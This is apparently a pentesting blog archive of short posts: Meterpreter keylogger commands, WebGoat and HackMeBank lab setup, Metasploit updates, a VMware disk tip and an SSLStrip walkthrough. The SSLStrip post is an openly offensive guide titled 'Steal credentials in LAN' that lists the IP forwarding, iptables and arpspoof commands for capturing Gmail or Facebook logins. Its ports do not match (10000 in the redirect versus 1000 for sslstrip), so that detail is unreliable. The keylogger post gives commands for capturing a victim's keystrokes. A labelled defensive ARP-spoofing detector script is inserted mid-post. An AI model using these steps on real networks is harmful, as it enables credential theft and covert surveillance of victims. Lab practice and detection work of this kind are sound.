
Keylogger inside Meterpreter–Metasploit

30 Jul

Once you have a meterpreter session, migrate into the explorer.exe process and type

keyscan_start - starts the keylogger
keyscan_dump - prints the captured keystrokes


WebGoat in Samurai

18 Jul

Samurai is a web application pentesting framework which comes with all the necessary tools.

> Open Samurai
> Open firefox
> Navigate to http://localhost:8080/webgoat/attack
> Username and password are guest
> Click start webgoat button


HackMeBank on – windows XP

16 Jul

HackMeBank is a sample application on which you can practice and test your hacking skills. To learn how to set up HackMeBank on Windows XP, visit
http://www.pingtrip.com/weblog/2008/09/installing-hacme-bank-on-xp-pro

Following the steps in the above link lets you run HackMeBank on SQL Server 2000 Express Edition. If you have a newer SQL Server, you can point HackMeBank at it by editing the web.config file.

To run HackMeBank on SQL Server 2008, install SQL Server 2008 instead of SQL Server 2000 Express. Navigate to the HacmeBank_v2_WS folder, open web.config and provide the SQL Server 2008 username and password:

<add key="FoundStone_Connection" value="Server=(local);Database=FoundStone_Bank;User Id=Username;password=password"/>

To run HackMeBank on a different port, navigate to the HacmeBank_v2_Website folder, open web.config and change the value below:

<add key="ipAddressOfWebService" value="127.0.0.1:port number"/>


Steal credentials in LAN – SSLStrip

24 May

SSLStrip can be used to steal gmail, facebook... (any https site) credentials on a LAN. Backtrack comes with SSLStrip pre-installed.

The steps below explain the usage of SSLStrip to steal credentials.
Attacker: Backtrack 4 Linux machine
Victim: Windows XP machine

On Backtrack 4 terminal,

  • echo 1 > /proc/sys/net/ipv4/ip_forward
  • iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
  • arpspoof -i eth0 -t victimip routerip

On other terminal:

  • sslstrip -l 1000

If you are using Backtrack 5, then do the following to start SSLStrip.

  • Go to start->info gathering->web app tools->ssl analysis->sslstrip
  • chmod +x sslstrip.py
  • python sslstrip.py -l 1000

Now, on the Windows XP machine, open a browser (IE). Type gmail and hit ctrl+enter.

Type username and password to log into your gmail.

By this time SSLStrip has captured the credentials and stored them in the sslstrip.log file. To view the log,

On backtrack terminal:

  • cat sslstrip.log
To understand it in a better way watch this video -
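The attack above only works because the victim accepts forged ARP replies that re-bind the router's IP address to the attacker's MAC. From the defender's side, that leaves a visible trace: the same IP being claimed by two different MACs. The following is an added example, not part of the original post, that parses tcpdump-style ARP reply lines (the line format and all sample lines are constructed for this example) and reports every IP with more than one claimant, with the time each MAC was first seen.

```python
import re
from collections import defaultdict

# Constructed sample capture in tcpdump-style ARP reply format. The third
# line re-binds the router IP 192.168.1.1 to a second MAC, which is the
# pattern a gateway-spoofing attack produces.
SAMPLE_ARP_LOG = """\
10:01:02.100 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:01, length 28
10:01:03.200 ARP, Reply 192.168.1.20 is-at 00:11:22:33:44:20, length 28
10:01:05.300 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:99, length 28
10:01:06.400 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:99, length 28
"""

ARP_REPLY = re.compile(
    r"^(?P<ts>\S+) ARP, Reply (?P<ip>\d+\.\d+\.\d+\.\d+) is-at (?P<mac>[0-9a-f:]{17})",
    re.IGNORECASE,
)


def parse_arp_replies(text):
    """Yield (timestamp, ip, mac) for each ARP reply line; other lines are skipped."""
    for line in text.splitlines():
        m = ARP_REPLY.match(line)
        if m:
            yield m.group("ts"), m.group("ip"), m.group("mac").lower()


def detect_arp_conflicts(text):
    """Return {ip: {mac: first_seen_timestamp}} for IPs claimed by more than one MAC.

    A single IP legitimately maps to one MAC; a second claimant appearing
    mid-capture is the signature of ARP spoofing (or a misconfigured host).
    """
    first_seen = defaultdict(dict)
    for ts, ip, mac in parse_arp_replies(text):
        first_seen[ip].setdefault(mac, ts)  # keep the earliest timestamp per MAC
    return {ip: macs for ip, macs in first_seen.items() if len(macs) > 1}


if __name__ == "__main__":
    for ip, macs in detect_arp_conflicts(SAMPLE_ARP_LOG).items():
        claimants = ", ".join(f"{mac} (first seen {ts})" for mac, ts in macs.items())
        print(f"ALERT: {ip} claimed by {len(macs)} MACs: {claimants}")
```

Running it on a live capture means feeding it the output of `tcpdump -n -l arp` on a monitoring host; the server-side control that defeats the HTTPS-to-HTTP downgrade itself is HSTS, which this script does not replace.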

Update metasploit on backtrack

04 May

To update the existing metasploit, in the backtrack terminal type
> msfupdate           (or)
> svn update /pentest/exploits/framework3 (or)

>sudo bash
>cd /opt/framework3/msf3/
>svn update
To remove metasploit from backtrack,
> apt-get purge framework3

To install the updated version,
> apt-get update && apt-get install framework3
If you notice the following error during the upgrade, use the steps mentioned below.

"svn: /opt/framework/common/lib/libssl.so.0.9.8: no version information available (required by /opt/framework/common/lib/libserf-0.so.0)
svn: /opt/framework/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/framework/common/lib/libserf-0.so.0)"

> cd /opt/framework/common/lib
> mv libcrypto.so.0.9.8 libcrypto.so.0.9.8-b
> mv libssl.so.0.9.8 libssl.so.0.9.8-backup
> ln -s /usr/lib/libcrypto.so.0.9.8
> ln -s /usr/lib/libssl.so.0.9.8
> msfupdate

[Update - August 31, 2012]

On Backtrack 5 R1,
To uninstall the existing metasploit -
> cd /opt/framework/
> ./uninstall

To install the latest version of metasploit -
> apt-get update
> apt-get install metasploit


increasing size of VMWare harddisk

10 Mar

Make sure that your VM does not have any snapshots. If you have a snapshot, create a clone of the VM and run the following command on the clone.

c:\Program files\Virtual machine\vmworkstations\vmware-vdiskmanager -x sizeGB file.vmdk